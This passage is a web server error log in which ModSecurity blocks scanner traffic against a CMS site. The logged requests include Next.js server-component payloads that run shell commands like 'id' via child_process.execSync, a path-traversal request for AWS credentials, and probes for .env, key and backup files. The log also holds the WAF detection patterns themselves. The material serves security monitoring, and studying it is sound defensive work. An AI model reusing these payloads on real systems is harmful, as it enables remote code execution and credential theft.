Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_jvsl};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/api/"] [unique_id "aX7Cay0X30NspmATJTwZCAAAANA"] [Sun Feb 01 05:03:07.195738 2026] [:error] [pid 16364:tid 16386] [client 195.178.110.31:43266] [client 195.178.110.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _zvdw=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _gbnd=Buffer.from(_zvdw).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_gbnd};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/_next/"] [unique_id "aX7Cay0X30NspmATJTwZCQAAANQ"] [Tue Feb 03 00:55:59.991193 2026] [authz_core:error] [pid 23780:tid 23833] [client 128.199.182.55:57624] AH01630: client denied by server configuration: /home/id/cms-1.dev-unit.com/server-status [Tue Feb 03 00:56:17.521530 2026] [:error] [pid 22857:tid 22865] [client 128.199.182.55:51876] [client 128.199.182.55] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS_NAMES:<?php $env["USERNAME"] . [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "cms-1.dev-unit.com"] [uri "/php-cgi/php-cgi.exe"] [unique_id "aYErkQH3nyCyItfwtYA4IgAAAQA"] [Tue Feb 03 00:56:17.896908 2026] [authz_core:error] [pid 23904:tid 23910] [client 139.59.132.8:36064] AH01630: client denied by server configuration: /home/id/cms-1.dev-unit.com/server-status [Tue Feb 03 00:56:32.345378 2026] [:error] [pid 23778:tid 23803] [client 139.59.132.8:51036] [client 139.59.132.8] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS_NAMES:<?php $env["USERNAME"] . [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "cms-1.dev-unit.com"] [uri "/php-cgi/php-cgi.exe"] [unique_id "aYEroHadThLZu6CSUSYCkAAAABU"] [Tue Feb 03 01:01:25.046049 2026] [:error] [pid 23780:tid 23833] [client 176.65.148.161:47350] [client 176.65.148.161] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-2048"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aYEsxTYAU6ywNH6ycr_I8gAAAIg"] [Tue Feb 03 02:35:01.557734 2026] [:error] [pid 22857:tid 22871] [client 195.178.110.34:47270] [client 195.178.110.34] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".db"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.cms-1.dev-unit.com"] [uri "/.svn/wc.db"] [unique_id "aYFCtQH3nyCyItfwtYBx3QAAAQY"] [Tue Feb 03 11:46:22.425481 2026] [:error] [pid 1374:tid 1382] [client 213.209.159.175:51616] [client 213.209.159.175] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'].*?[,].*(((v|(\\\\\\\\u0076)|(\\\\166)|(\\\\x76))[^a-z0-9]*(a|(\\\\\\\\u0061)|(\\\\141)|(\\\\x61))[^a-z0-9]*(l|(\\\\\\\\u006C)|(\\\\154)|(\\\\x6C))[^a-z0-9]*(u|(\\\\\\\\u0075)|(\\\\165)|(\\\\x75))[^a-z0-9]*(e|(\\\\\\\\u0065)|(\\\\145)|(\\\\x65))[^a-z0-9]*(O|(\\\\\\\\u004F)|(\\\\117)|(\\\\ ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "504"] [id "973347"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22_response\\x22:{\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo VULN_TEST_12345',{'timeout':30000}).toString();throw Object.assign(new Error('NEXT_REDIRECT'),{digest: found within ARGS:0: {\\x22_response\\x22:{\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo VULN_TEST_12345',{'timeo..."] [ve [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aYHD7s2QAFCynDMJyENzcAAAAAY"] [Tue Feb 03 11:46:22.498577 2026] [:error] [pid 1374:tid 1395] [client 213.209.159.175:51630] [client 213.209.159.175] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'].*?[,].*(((v|(\\\\\\\\u0076)|(\\\\166)|(\\\\x76))[^a-z0-9]*(a|(\\\\\\\\u0061)|(\\\\141)|(\\\\x61))[^a-z0-9]*(l|(\\\\\\\\u006C)|(\\\\154)|(\\\\x6C))[^a-z0-9]*(u|(\\\\\\\\u0075)|(\\\\165)|(\\\\x75))[^a-z0-9]*(e|(\\\\\\\\u0065)|(\\\\145)|(\\\\x65))[^a-z0-9]*(O|(\\\\\\\\u004F)|(\\\\117)|(\\\\ ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "504"] [id "973347"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22_response\\x22:{\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('id',{'timeout':30000}).toString();throw Object.assign(new Error('NEXT_REDIRECT'),{digest: found within ARGS:0: {\\x22_response\\x22:{\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('id',{'timeout':30000}).toString();throw Object...."] [ve [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aYHD7s2QAFCynDMJyENzcQAAABM"] [Tue Feb 03 13:09:11.948610 2026] [:error] [pid 1224:tid 1293] [client 195.178.110.132:58868] [client 195.178.110.132] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/wp-config.bak"] [unique_id "aYHXV1ljbMg2qtoq2GHkTQAAAI0"] [Wed Feb 04 00:57:18.606399 2026] [authz_core:error] [pid 1374:tid 1398] [client 165.227.173.41:52268] AH01630: client denied by server configuration: /home/id/cms-1.dev-unit.com/server-status [Wed Feb 04 00:57:33.193118 2026] [:error] [pid 1374:tid 1400] [client 165.227.173.41:36826] [client 165.227.173.41] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS_NAMES:<?php $env["USERNAME"] . [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "www.cms-1.dev-unit.com"] [uri "/php-cgi/php-cgi.exe"] [unique_id "aYJ9Xc2QAFCynDMJyENBRAAAABg"] [Wed Feb 04 00:57:37.958909 2026] [authz_core:error] [pid 7570:tid 7617] [client 143.110.213.72:55988] AH01630: client denied by server configuration: /home/id/cms-1.dev-unit.com/server-status [Wed Feb 04 00:57:53.288176 2026] [:error] [pid 1343:tid 1347] [client 143.110.213.72:39388] [client 143.110.213.72] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS_NAMES:<?php $env["USERNAME"] . [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "www.cms-1.dev-unit.com"] [uri "/php-cgi/php-cgi.exe"] [unique_id "aYJ9cTn2xN5EObwmm-RthgAAAMI"] [Wed Feb 04 04:58:05.015314 2026] [:error] [pid 11103:tid 11114] [client 216.73.216.170:48842] PHP Warning: Undefined array key "color" in /home/id/cms-1.dev-unit.com/assets/front/css/common-base-color.php on line 3 [Wed Feb 04 04:58:10.881310 2026] [autoindex:error] [pid 11103:tid 11116] [client 216.73.216.170:16726] AH01276: Cannot serve directory /home/id/cms-1.dev-unit.com/assets/front/img/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://cms-1.dev-unit.com/assets/front/img [Wed Feb 04 04:58:39.779091 2026] [:error] [pid 23343:tid 23351] [client 216.73.216.170:51253] PHP Warning: Undefined array key "color" in /home/id/cms-1.dev-unit.com/assets/front/css/lawyer-base-color.php on line 3 [Wed Feb 04 05:28:24.829185 2026] [:error] [pid 11103:tid 11120] [client 185.177.72.51:47286] [client 185.177.72.51] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/env.bak"] [unique_id "aYK82MS9A8z0dGN8UF_d8AAAAQo"] [Wed Feb 04 05:28:25.469640 2026] [:error] [pid 23164:tid 23293] [client 185.177.72.51:47308] [client 185.177.72.51] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /pms?module=logging&file_name=../../../../../../~/.aws/credentials&number_of_lines=10000"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "cms-1.dev-unit.com"] [uri "/pms"] [unique_id "aYK82RXmL5E7aAVROfDtNAAAAI8"] [Wed Feb 04 05:28:48.044787 2026] [access_compat:error] [pid 11103:tid 11130] [client 185.177.72.51:1338] AH01797: client denied by server configuration: /home/id/cms-1.dev-unit.com/core/.env [Wed Feb 04 05:28:49.909147 2026] [:error] [pid 11103:tid 11113] [client 185.177.72.51:1396] [client 185.177.72.51] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/config/settings.ini"] [unique_id "aYK88cS9A8z0dGN8UF_eKgAAAQM"] [Wed Feb 04 05:28:54.665696 2026] [:error] [pid 11103:tid 11125] [client 185.177.72.51:20934] [client 185.177.72.51] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/env.backup"] [unique_id "aYK89sS9A8z0dGN8UF_eOAAAAQ8"] [Wed Feb 04 05:29:00.488613 2026] [:error] [pid 11103:tid 11112] [client 185.177.72.51:21114] [client 185.177.72.51] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/storage/logs/laravel.log"] [unique_id "aYK8_MS9A8z0dGN8UF_eSAAAAQI"] [Wed Feb 04 05:29:00.844847 2026] [:error] [pid 23164:tid 23298] [client 185.177.72.51:21116] [client 185.177.72.51] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".key"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/server.key"] [unique_id "aYK8_BXmL5E7aAVROfDtSwAAAJQ"] [Wed Feb 04 05:29:01.176702 2026] [:error] [pid 23164:tid 23293] [client 185.177.72.51:21130] [client 185.177.72.51] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/php5.ini"] [unique_id "aYK8_RXmL5E7aAVROfDtTQAAAI8"] [Wed Feb 04 05:29:04.746334 2026] [:error] [pid 11103:tid 11127] [client 185.177.72.51:37526] [client 185.177.72.51] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/config.ini"] [unique_id "aYK9AMS9A8z0dGN8UF_eWwAAARE"] [Wed Feb 04 05:29:05.061941 2026] [:error] [pid 11103:tid 11125] [client 185.177.72.51:37530] [client 185.177.72.51] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/.aws/credentials.bak"] [unique_id "aYK9AcS9A8z0dGN8UF_eXQAAAQ8"] [Wed Feb 04 05:29:05.738662 2026] [:error] [pid 23164:tid 23281] [client 185.177.72.51:37556] [client 185.177.72.51] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/.bak"] [unique_id "aYK9ARXmL5E7aAVROfDtUQAAAIc"] [Wed Feb 04 05:29:18.312564 2026] [authz_core:error] [pid 23164:tid 23292] [client 185.177.72.51:4282] AH01630: client denied by server configuration: /home/id/cms-1.dev-unit.com/.htaccess [Wed Feb 04 05:30:33.943011 2026] [access_compat:error] [pid 11103:tid 11114] [client 185.177.72.51:1028] AH01797: client denied by server configuration: /home/id/cms-1.dev-unit.com/core/app/.env [Wed Feb 04 05:30:33.955887 2026] [access_compat:error] [pid 11103:tid 11123] [client 185.177.72.51:1028] AH01797: client denied by server configuration: /home/id/cms-1.dev-unit.com/core/Datavase [Wed Feb 04 05:30:33.983843 2026] [access_compat:error] [pid 11103:tid 11118] [client 185.177.72.51:1028] AH01797: client denied by server configuration: /home/id/cms-1.dev-unit.com/core/persistence [Wed Feb 04 05:30:34.000142 2026] [access_compat:error] [pid 11103:tid 11112] [client 185.177.72.51:1028] AH01797: client denied by server configuration: /home/id/cms-1.dev-unit.com/core/src [Wed Feb 04 05:30:39.825439 2026] [:error] [pid 11103:tid 11127] [client 185.177.72.51:1182] [client 185.177.72.51] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/db.sql"] [unique_id "aYK9X8S9A8z0dGN8UF_fSgAAARE"] [Wed Feb 04 05:30:39.841235 2026] [:error] [pid 11103:tid 11110] [client 185.177.72.51:1182] [client 185.177.72.51] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ 